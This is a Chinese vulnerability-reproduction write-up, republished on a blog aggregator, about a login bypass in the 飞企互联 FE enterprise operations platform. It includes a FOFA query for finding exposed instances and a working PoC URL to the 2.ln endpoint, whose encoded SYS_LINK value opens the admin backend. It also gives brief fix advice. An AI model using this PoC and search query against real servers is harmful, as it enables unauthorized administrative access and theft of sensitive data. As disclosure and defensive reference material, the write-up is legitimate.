飞企互联-FE企业运营管理平台 登录绕过漏洞复现
发布时间:2023年12月28日
0x01 产品简介
飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外,支持企业B2B、C2B与O2O等核心需求,为不同行业客户的互联网+转型提供支持。
0x02 漏洞概述
飞企互联-FE企业运营管理平台?2.ln接口处存在登录绕过漏洞,未授权的攻击者可构造恶意的url访问页面,可直接进入后台管理页面,获取敏感信息,进一步利用可控制整个服务器。
0x03 复现环境
FOFA:app="飞企互联-FE企业运营管理平台"
0x04 漏洞复现
PoC
http://your-ip/2.ln?SYS_LINK=77507068764957484a5067777862714f457a66574871642f4330574c76717868394a35496d37416c497951724f33446f51486375685a5a2b31684938472b7056直接拼接url即可进入后台
?
0x05 修复建议
关闭或删除相关接口
升级至安全版本
文章来源:https://blog.csdn.net/qq_41904294/article/details/135258831
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!
最新文章
- Python教程
- 深入理解 MySQL 中的 HAVING 关键字和聚合函数
- Qt之QChar编码(1)
- MyBatis入门基础篇
- 用Python脚本实现FFmpeg批量转换
- 架构师的36项修炼-开篇词
- SSL证书在哪里申请?
- 无刷电机学习-原理篇
- 【fly-iot飞凡物联】(16):开源IOT物联网项目,成接入Emqx的MQTT服务,并且配置MySQL数据库鉴权, 还是非常方便的,可以使用websocker连接测试
- 【计网复习】第一章概述-知识点总结(超详细版!!)
- 接口测试到底怎么做,5分钟时间看完这篇文章彻底搞清楚
- 多云环境下的Docker部署策略
- TCP中的三次握手和四次挥手
- Qt/QML编程学习之心得:使用camera摄像头(35)
- 光条中心线提取-Steger算法 [OpenCV]